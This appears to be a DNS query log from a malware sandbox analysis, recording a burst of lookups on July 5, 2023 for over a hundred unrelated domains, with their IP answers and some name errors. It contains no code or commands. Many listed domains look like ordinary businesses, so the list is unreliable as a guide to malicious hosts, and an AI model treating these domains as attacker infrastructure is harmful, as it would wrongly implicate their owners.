                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.346966982 CEST8.8.8.8192.168.2.60xf4bbNo error (0)xsui.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.382975101 CEST8.8.8.8192.168.2.60x6d21No error (0)aoinko.net157.7.107.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.385436058 CEST8.8.8.8192.168.2.60x67a1No error (0)from30ty.com157.7.231.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.391853094 CEST8.8.8.8192.168.2.60x4556No error (0)popbook.com47.91.167.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.395953894 CEST8.8.8.8192.168.2.60x6d04No error (0)hamaker.net34.102.136.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.518405914 CEST8.8.8.8192.168.2.60x3cb9No error (0)yasuma.com61.200.81.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.621113062 CEST8.8.8.8192.168.2.60xcbd4No error (0)shittas.com43.246.117.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.639012098 CEST8.8.8.8192.168.2.60x2aa4No error (0)akr.co.id104.20.123.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.639012098 CEST8.8.8.8192.168.2.60x2aa4No error (0)akr.co.id172.67.33.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.639012098 CEST8.8.8.8192.168.2.60x2aa4No error (0)akr.co.id104.20.122.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.654481888 CEST8.8.8.8192.168.2.60xb43aNo error (0)lpver.com92.204.129.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.714117050 CEST8.8.8.8192.168.2.60xf6feNo error (0)nettlinx.org202.53.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.733124018 CEST8.8.8.8192.168.2.60x70d7No error (0)sokuwan.net185.230.63.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.733124018 CEST8.8.8.8192.168.2.60x70d7No error (0)sokuwan.net185.230.63.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.733124018 CEST8.8.8.8192.168.2.60x70d7No error (0)sokuwan.net185.230.63.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.768475056 CEST8.8.8.8192.168.2.60x2c6dName error (3)eos-i.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.778923035 CEST8.8.8.8192.168.2.60xd03dNo error (0)pccj.net172.67.148.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.778923035 CEST8.8.8.8192.168.2.60xd03dNo error (0)pccj.net104.21.29.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.804332972 CEST8.8.8.8192.168.2.60xaa12No error (0)linac.co.uk23.236.62.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.807926893 CEST8.8.8.8192.168.2.60x9f14No error (0)kustnara.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.807926893 CEST8.8.8.8192.168.2.60x9f14No error (0)kustnara.com76.223.27.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.807926893 CEST8.8.8.8192.168.2.60x9f14No error (0)kustnara.com13.248.155.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.807926893 CEST8.8.8.8192.168.2.60x9f14No error (0)kustnara.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.817887068 CEST8.8.8.8192.168.2.60xfa7bNo error (0)kewlmail.com63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.834665060 CEST8.8.8.8192.168.2.60x720eName error (3)mjrcpas.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.887716055 CEST8.8.8.8192.168.2.60xa5d0No error (0)bount.com.tw188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.887716055 CEST8.8.8.8192.168.2.60xa5d0No error (0)bount.com.tw188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.950320959 CEST8.8.8.8192.168.2.60xbe82No error (0)peminet.net198.54.117.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:41.960813046 CEST8.8.8.8192.168.2.60x6a0No error (0)burstner.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.019215107 CEST8.8.8.8192.168.2.60x1dd1No error (0)hamaker.net34.102.136.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.023076057 CEST8.8.8.8192.168.2.60x522aNo error (0)forbin.net172.67.148.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.023076057 CEST8.8.8.8192.168.2.60x522aNo error (0)forbin.net104.21.41.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.050421000 CEST8.8.8.8192.168.2.60xc7bdNo error (0)apcotex.com35.154.163.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.050879955 CEST8.8.8.8192.168.2.60xdb2bNo error (0)www.sclover3.com157.112.182.239A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.089550972 CEST8.8.8.8192.168.2.60x6965No error (0)ccrsi.org198.209.253.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.090356112 CEST8.8.8.8192.168.2.60xe468No error (0)pellys.co.uk77.72.4.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.111112118 CEST8.8.8.8192.168.2.60x1bbeName error (3)eos-i.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.111145973 CEST8.8.8.8192.168.2.60x5e6cNo error (0)siongann.com104.21.8.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.111145973 CEST8.8.8.8192.168.2.60x5e6cNo error (0)siongann.com172.67.156.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.127592087 CEST8.8.8.8192.168.2.60xee41No error (0)106west.com148.130.4.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.127895117 CEST8.8.8.8192.168.2.60x44eNo error (0)htsmx.net63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.129251957 CEST8.8.8.8192.168.2.60xaa1fNo error (0)wvs-net.de188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.129251957 CEST8.8.8.8192.168.2.60xaa1fNo error (0)wvs-net.de188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.132925987 CEST8.8.8.8192.168.2.60xc2a8No error (0)nettle.pl195.128.140.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.134176016 CEST8.8.8.8192.168.2.60x234dNo error (0)revoldia.net154.210.36.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.138017893 CEST8.8.8.8192.168.2.60x84f4No error (0)dwid.de87.230.93.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.167772055 CEST8.8.8.8192.168.2.60xdeddNo error (0)ccrsi.org198.209.253.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.200567007 CEST8.8.8.8192.168.2.60x2693Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.223422050 CEST8.8.8.8192.168.2.60x1697No error (0)nrsi.com76.223.35.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.225688934 CEST8.8.8.8192.168.2.60xfdc4No error (0)calvinly.com216.239.38.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.225688934 CEST8.8.8.8192.168.2.60xfdc4No error (0)calvinly.com216.239.32.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.225688934 CEST8.8.8.8192.168.2.60xfdc4No error (0)calvinly.com216.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.225688934 CEST8.8.8.8192.168.2.60xfdc4No error (0)calvinly.com216.239.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.227698088 CEST8.8.8.8192.168.2.60xa0b3Name error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.230465889 CEST8.8.8.8192.168.2.60x125eNo error (0)cbras.com54.39.198.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.236577988 CEST8.8.8.8192.168.2.60xb5f3No error (0)refintl.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.236577988 CEST8.8.8.8192.168.2.60xb5f3No error (0)refintl.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.236577988 CEST8.8.8.8192.168.2.60xb5f3No error (0)refintl.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.236577988 CEST8.8.8.8192.168.2.60xb5f3No error (0)refintl.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.238538027 CEST8.8.8.8192.168.2.60xab88No error (0)rtcasey.com69.195.90.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.240629911 CEST8.8.8.8192.168.2.60xc338No error (0)aluminox.es37.59.243.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.240761042 CEST8.8.8.8192.168.2.60xb9e8No error (0)cyclad.pl87.98.236.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.246300936 CEST8.8.8.8192.168.2.60x7eaNo error (0)likangds.com23.225.40.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.246666908 CEST8.8.8.8192.168.2.60x2693Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.252458096 CEST8.8.8.8192.168.2.60xd7f0Name error (3)mjrcpas.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.261771917 CEST8.8.8.8192.168.2.60xb7bNo error (0)infotech.pl79.96.32.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.282649994 CEST8.8.8.8192.168.2.60x6b58No error (0)rkengg.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.282649994 CEST8.8.8.8192.168.2.60x6b58No error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.282649994 CEST8.8.8.8192.168.2.60x6b58No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.282649994 CEST8.8.8.8192.168.2.60x6b58No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.312916994 CEST8.8.8.8192.168.2.60xdd4cNo error (0)burstner.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.331470966 CEST8.8.8.8192.168.2.60x839aServer failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.346565008 CEST8.8.8.8192.168.2.60xcc72Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.355456114 CEST8.8.8.8192.168.2.60x11e7Server failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.355984926 CEST8.8.8.8192.168.2.60x4b9dNo error (0)gcss.com15.197.204.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.355984926 CEST8.8.8.8192.168.2.60x4b9dNo error (0)gcss.com3.33.243.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.362067938 CEST8.8.8.8192.168.2.60xb44bNo error (0)kewlmail.com63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.362085104 CEST8.8.8.8192.168.2.60xff85No error (0)karmy.com.pl185.253.212.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.383271933 CEST8.8.8.8192.168.2.60x222No error (0)revoldia.net154.210.36.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.391649008 CEST8.8.8.8192.168.2.60x1e78Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.399668932 CEST8.8.8.8192.168.2.60xab96No error (0)zupraha.cz77.78.104.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.400451899 CEST8.8.8.8192.168.2.60xb281No error (0)sjbmw.com164.92.82.47A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.413691998 CEST8.8.8.8192.168.2.60x4d2bNo error (0)shztm.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.413722038 CEST8.8.8.8192.168.2.60xf30dNo error (0)gbmfg.com151.101.2.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.413722038 CEST8.8.8.8192.168.2.60xf30dNo error (0)gbmfg.com151.101.66.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.413722038 CEST8.8.8.8192.168.2.60xf30dNo error (0)gbmfg.com151.101.130.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.413722038 CEST8.8.8.8192.168.2.60xf30dNo error (0)gbmfg.com151.101.194.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.464766979 CEST8.8.8.8192.168.2.60xa15aNo error (0)xsui.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.465681076 CEST8.8.8.8192.168.2.60x8deeNo error (0)vfcindia.com103.191.209.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.468055010 CEST8.8.8.8192.168.2.60x9834Name error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.470027924 CEST8.8.8.8192.168.2.60xa88cNo error (0)dog-jog.net153.122.24.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.481491089 CEST8.8.8.8192.168.2.60x51c4No error (0)cbaben.com173.205.126.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.487644911 CEST8.8.8.8192.168.2.60x6679No error (0)nme.co.jp203.0.113.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.489258051 CEST8.8.8.8192.168.2.60xcfafNo error (0)canasil.com172.67.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.489258051 CEST8.8.8.8192.168.2.60xcfafNo error (0)canasil.com104.26.3.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.489258051 CEST8.8.8.8192.168.2.60xcfafNo error (0)canasil.com104.26.2.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.491437912 CEST8.8.8.8192.168.2.60x2d13No error (0)stopllc.com162.241.233.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.495316982 CEST8.8.8.8192.168.2.60x91e3No error (0)pellys.co.uk77.72.4.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.496660948 CEST8.8.8.8192.168.2.60xfadbNo error (0)uster.com104.20.221.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.496660948 CEST8.8.8.8192.168.2.60xfadbNo error (0)uster.com104.20.220.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.496660948 CEST8.8.8.8192.168.2.60xfadbNo error (0)uster.com172.67.32.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.497570992 CEST8.8.8.8192.168.2.60xc7beNo error (0)shiner.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.497570992 CEST8.8.8.8192.168.2.60xc7beNo error (0)shiner.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.506544113 CEST8.8.8.8192.168.2.60x70bNo error (0)yasuma.com61.200.81.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.520133972 CEST8.8.8.8192.168.2.60xc9d3No error (0)daytonir.com172.64.147.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.520133972 CEST8.8.8.8192.168.2.60xc9d3No error (0)daytonir.com104.18.40.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.580327034 CEST8.8.8.8192.168.2.60xed9cNo error (0)nels.co.uk5.134.13.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.581770897 CEST8.8.8.8192.168.2.60xf24cNo error (0)vvsteknik.dk185.31.76.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.596215963 CEST8.8.8.8192.168.2.60x66beNo error (0)camamat.com104.21.235.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.596215963 CEST8.8.8.8192.168.2.60x66beNo error (0)camamat.com104.21.235.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.610320091 CEST8.8.8.8192.168.2.60xb7ebNo error (0)yhsll.com102.134.49.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.618874073 CEST8.8.8.8192.168.2.60x13eNo error (0)amic.at78.46.224.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.622020960 CEST8.8.8.8192.168.2.60xbb1eNo error (0)lpver.com92.204.129.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.622051954 CEST8.8.8.8192.168.2.60xb4bfName error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.630486012 CEST8.8.8.8192.168.2.60xf7b7No error (0)nlcv.bas.bg195.96.252.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.640011072 CEST8.8.8.8192.168.2.60x6921No error (0)cyclad.pl87.98.236.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.651567936 CEST8.8.8.8192.168.2.60x4408No error (0)gphpedit.org127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.652815104 CEST8.8.8.8192.168.2.60x55c0No error (0)wnit.org38.111.255.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.656099081 CEST8.8.8.8192.168.2.60xe88cNo error (0)wnit.org38.111.255.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.680717945 CEST8.8.8.8192.168.2.60x65f9Name error (3)mjrcpas.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.708357096 CEST8.8.8.8192.168.2.60x65b5Name error (3)eos-i.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.752696991 CEST8.8.8.8192.168.2.60x9812Server failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.755026102 CEST8.8.8.8192.168.2.60x9ba0No error (0)bigzz.by178.249.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.760441065 CEST8.8.8.8192.168.2.60x7a93Name error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.770255089 CEST8.8.8.8192.168.2.60xef04Name error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.783312082 CEST8.8.8.8192.168.2.60x5892No error (0)duiops.net135.125.108.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.788986921 CEST8.8.8.8192.168.2.60x1f66No error (0)popbook.com47.91.167.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.790587902 CEST8.8.8.8192.168.2.60xbef5Name error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.792387962 CEST8.8.8.8192.168.2.60x70aServer failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.792849064 CEST8.8.8.8192.168.2.60xe51eNo error (0)at-shun.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.813214064 CEST8.8.8.8192.168.2.60x172dNo error (0)infotech.pl79.96.32.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.839342117 CEST8.8.8.8192.168.2.60x2089No error (0)kumaden.com49.212.180.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.873991966 CEST8.8.8.8192.168.2.60xc9a8No error (0)karmy.com.pl185.253.212.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.894053936 CEST8.8.8.8192.168.2.60x56adName error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.900634050 CEST8.8.8.8192.168.2.60x4477No error (0)any-s.net108.170.12.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.953757048 CEST8.8.8.8192.168.2.60xc925No error (0)dwid.de87.230.93.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.958271980 CEST8.8.8.8192.168.2.60x8c8dNo error (0)s5w.com192.99.226.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.963871956 CEST8.8.8.8192.168.2.60xbc0dNo error (0)angework.com219.94.128.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:42.972361088 CEST8.8.8.8192.168.2.60x3d8cNo error (0)hazmatt.com205.178.189.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.006095886 CEST8.8.8.8192.168.2.60xd4aeNo error (0)themark.org35.172.94.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.006095886 CEST8.8.8.8192.168.2.60xd4aeNo error (0)themark.org100.24.208.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.009659052 CEST8.8.8.8192.168.2.60x4993No error (0)kustnara.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.009659052 CEST8.8.8.8192.168.2.60x4993No error (0)kustnara.com76.223.27.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.009659052 CEST8.8.8.8192.168.2.60x4993No error (0)kustnara.com13.248.155.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.009659052 CEST8.8.8.8192.168.2.60x4993No error (0)kustnara.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.012840986 CEST8.8.8.8192.168.2.60x75e8No error (0)redgiga.com104.21.76.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.012840986 CEST8.8.8.8192.168.2.60x75e8No error (0)redgiga.com172.67.186.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.019399881 CEST8.8.8.8192.168.2.60x65aeNo error (0)x96.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.019399881 CEST8.8.8.8192.168.2.60x65aeNo error (0)x96.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.078355074 CEST8.8.8.8192.168.2.60xc219No error (0)rokoron.com211.13.204.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.083283901 CEST8.8.8.8192.168.2.60xb8b2Name error (3)89gospel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.083697081 CEST8.8.8.8192.168.2.60x9936No error (0)uster.com104.20.220.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.083697081 CEST8.8.8.8192.168.2.60x9936No error (0)uster.com104.20.221.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.083697081 CEST8.8.8.8192.168.2.60x9936No error (0)uster.com172.67.32.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.103527069 CEST8.8.8.8192.168.2.60x5917No error (0)isom.org192.124.249.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.124188900 CEST8.8.8.8192.168.2.60x517bName error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.130897045 CEST8.8.8.8192.168.2.60x2d39No error (0)cbaben.com173.205.126.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.146851063 CEST8.8.8.8192.168.2.60x1745No error (0)nme.co.jp203.0.113.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.152679920 CEST8.8.8.8192.168.2.60x2f27No error (0)vfcindia.com103.191.209.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.158490896 CEST8.8.8.8192.168.2.60x5689No error (0)kewlmail.com63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:43.166344881 CEST8.8.8.8192.168.2.60x4d7aName error (3)iranytu.netnonenoneA (IP address)IN (0x0001)false
